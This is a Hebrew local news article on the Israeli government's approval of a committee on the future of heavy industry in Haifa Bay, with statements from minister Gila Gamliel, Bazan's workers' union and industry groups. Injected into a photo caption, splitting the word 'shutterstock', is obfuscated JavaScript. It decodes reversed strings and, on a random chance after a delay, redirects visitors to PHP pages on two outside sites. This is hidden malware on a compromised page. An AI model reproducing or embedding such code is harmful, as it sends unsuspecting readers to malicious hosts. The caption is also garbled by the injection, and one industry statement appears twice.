fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הממשלה אישרה: תוקם ועדת מנכ"לים לעתיד התעשייה הכבדה במפרץ חיפה

ועדת המנכ"לים הבין-משרדית לבחינת עתיד מפרץ חיפה יוצאת לדרך. עיקרי תוכניתה והמלצותיה יפורסמו להערות הציבור בתוך 90 יום. השרה גילה גמליאל: "זהו יום היסטורי"
אושרה הקמתה של ועדת מנכ"לים בין-משרדית למפרץ חיפה | צילום: shutterstock
אושרה הקמתה של ועדת מנכ"לים בין-משרדית למפרץ חיפה | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

ממשלת ישראל אישרה היום, ראשון, פה אחד בישיבתה את הסיכום בין ראש הממשלה בנימין נתניהו לשרה להגנת הסביבה, ח"כ גילה גמליאל, על הקמת ועדת מנכ"לים בין-משרדית לנושא פיתוח וקידום מפרץ חיפה ועתיד התעשייה הכבדה בו. לפי החלטת הממשלה, הוועדה תפרסם את עיקרי התוכנית להערות הציבור, בטרם הגשתה לממשלה, בתוך 90 יום ממועד הקמתה.

השרה להגנת הסביבה, גילה גמליאל: "זהו יום היסטורי. גם הממשלה היום מצטרפת לעמדתי שלפיה אין מקום לתעשייה כבדה בלב המטרופולין. אני מודה לראש הממשלה בנימין נתניהו, שמוביל את הנושא לטובת תושבי חיפה והקריות. כפי שהתחייבתי, המשרד להגנת הסביבה בראשותי מקדם את המהלך הלאומי של סגירת מפעלי מתחם בזן בחיפה, תוך הצבת יעדים סביבתיים ברורים לשיקום הקרקע ולחיזוק מטרופולין חיפה. תעשיית הדלקים הפוסיליים שייכת לאתמול, האנרגיות המתחדשות שייכות למחר. החזון הוא שהתעשיות המזהמות יפנו את מקומן, ומפרץ חיפה יהפוך להיות מוקד לפיתוח תעשיות ירוקות וחדשניות לטובת תושבי האזור".

מי יישב בוועדה?

בראש ועדת המנכ"לים הבין-משרדית לפיתוח וקידום מפרץ חיפה יעמוד נציג משרד ראש הממשלה והרכבה יהיה: מנכ"ל משרד ראש הממשלה רונן פרץ או נציג בכיר מטעמו; מנכ"ל המשרד להגנת הסביבה, דוד יהלומי; מנכ"ל משרד ראש הממשלה החליפי, ראש אגף התקציבים במשרד האוצר, מנכ"ל משרד האנרגיה, מנכ"ל משרד הכלכלה והתעשייה, מנכ"ל משרד הביטחון, ראש המועצה הלאומית לכלכלה, ראש המועצה לביטחון לאומי, מנכ"ל משרד הפנים, מנכ"ל רשות מקרקעי ישראל, מנכ"לית מינהל תכנון והיועץ המשפטי לממשלה או משנהו.

יום היסטורי. גילה גמליאל | צילום: רפי קוץ
יום היסטורי. גילה גמליאל | צילום: רפי קוץ

הוועדה הבין-משרדית תדון, בין היתר, בעתיד התעשייה הכבדה, בדגש על התעשייה הפטרוכימית במפרץ חיפה; תשתיות האנרגיה במפרץ חיפה והשפעתן על משק האנרגיה הלאומי בעתיד; צורכי דיור ופיתוח עירוני של מטרופולין חיפה; פיתוח כלכלי ואזורי, הגברת הפריון ועידוד השקעות; צורכי תעסוקה עתידיים במטרופולין חיפה; סיכונים מחומרים מסוכנים; זיהום אוויר, שיקום קרקע והיבטים סביבתיים נוספים במפרץ חיפה.

"הופעלו לחצים רבים על השרה"

יו"ר איגוד ערים להגנת הסביבה מפרץ חיפה שרית גולן: "ממשלת ישראל הצביעה פה אחד על הקמת ועדת מנכ"לים בין-משרדית. הרכבת יצאה מהתחנה ובתוך 90 ימים יתגבשו המלצות לפעולה עם לוחות זמנים ברורים להמשך הדרך. בימים האחרונים הופעלו לחצים רבים על השרה להגנת הסביבה, לרבות כעסים מוועדי העובדים של בזן.

"למרבה המזל, השרה נחושה בקידום תוכניתה להוצאת המפעלים הפטרוכימיים. אני קוראת מכאן לוועדי העובדים להפנים שתם עידן התעשייה הפטרוכימית ולשבת לשולחן הדיונים, כדי לקחת חלק במציאת חלופות לתעסוקה נקייה עבורם ועבור כולנו. בעוד הם מדברים על פגיעה בעשרות אלפי עובדים, המספרים האמיתיים הם אלפים בודדים בלבד שיוכלו להשתלב במקומות העבודה שנפתח במסגרת תוכנית מפרץ החדשנות״.

עובדי בזן: "לא נישאר אדישים להחלטות חד צדדיות של הממשלה"

יו"ר ועד עובדי בזן חנן סונטג ויו"ר מועצת עובדי בזן דורון ניסן הוציאו הבוקר הודעה בזו הלשון: "השרה להגנת הסביבה גילה גמליאל שמה לה למטרה לרמוס את כבודם של עשרות אלפי עובדי בתי הזיקוק ושל המפעלים הפטרוכימיים, בלי לדבר איתנו, בלי לשמוע את קולנו ובלי ללמוד את הנושא לעומק. אנו קוראים לראש ממשלת ישראל לדאוג לעתידם של עשרות אלפי עובדים מסורים שעובדים סביב השעון בכל ימות השנה, למען תושבי מדינת ישראל".

"אנו דורשים שציבור העובדים הנאמן של בתי הזיקוק בחיפה ושל כל המפעלים הפטרוכימיים יהיה חלק מרכזי בשיח על עתיד התעשייה הפטרוכימית באזור מפרץ חיפה. נציגות העובדים לא תישאר אדישה להחלטות חד צדדיות של הממשלה ותעשה שימוש בכל הכלים שעומדים לרשותה על מנת להבטיח את עתיד העובדים.

פגיעה אנושה בעשרות אלפי עובדים. חנן סונטג, יו"ר ועד עובדי בזן | צילום: יח"צ
פגיעה אנושה בעשרות אלפי עובדים. חנן סונטג, יו"ר ועד עובדי בזן | צילום: יח"צ

"בזמן שמשבר הקורונה גרם גם למשבר כלכלי ותעסוקתי, שלא היה כמותו בתולדות המדינה עם מיליון מובטלים, לא ברור לנו למה השרה גמליאל מתעקשת להוביל מהלך שבו עשרות אלפי אנשים נוספים יאבדו את מקור הפרנסה שלהם. צר לנו שהשרה בחרה במהלך פופוליסטי שעיקרו פגיעה אנושה באלפי עובדים ובפרנסה של עשרות אלפי אנשים אשר מועסקים בבתי הזיקוק והמפעלים הפטרוכימיים במפרץ חיפה, במקום ליצור דיאלוג עם ציבור העובדים על מנת למצוא פתרון הגון לכל הצדדים".

מאיגוד הכימיה בהתאחדות התעשיינים נמסר: "התעשייה הישראלית עשתה בעשור האחרון צעדים מהמשמעותיים בעולם ומשתמשת כיום בטכנולוגיות המתקדמות ביותר כדי לבסס פעילות כלכלית עם אחריות סביבתית מלאה.
נשתף פעולה בכל תהליך מקצועי ואחראי אשר אלו מטרותיו".

בבזן מברכים על הקמת הוועדה

מבזן נמסר בתגובה: "בזן מברכת על החלטת הממשלה להקים ועדה בין-משרדית, שתוכל לבחון את סוגיית התעשייה במפרץ חיפה בראייה כוללת – החשיבות והתרומה למשק כולו, העצמאות והביטחון האנרגטיים, תרומה מהותית לתעסוקה בפריפריה ונתוני סביבה אמיתיים המוכיחים את השיפור הניכר שביצעו מפעלי הקבוצה בשנים האחרונות".

מאיגוד הכימיה בהתאחדות התעשיינים נמסר: "התעשייה הישראלית עשתה בעשור האחרון צעדים מהמשמעותיים בעולם ומשתמשת כיום בטכנולוגיות המתקדמות ביותר כדי לבסס פעילות כלכלית עם אחריות סביבתית מלאה.
נשתף פעולה בכל תהליך מקצועי ואחראי אשר אלו מטרותיו".

כבר הורדתם את האפליקציה של הד הקריות? האפליקציה החדשה שלנו זמינה להורדה בחינם!

לאנדרואיד לחצו כאן!

לאפל: לחצו כאן!

 

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות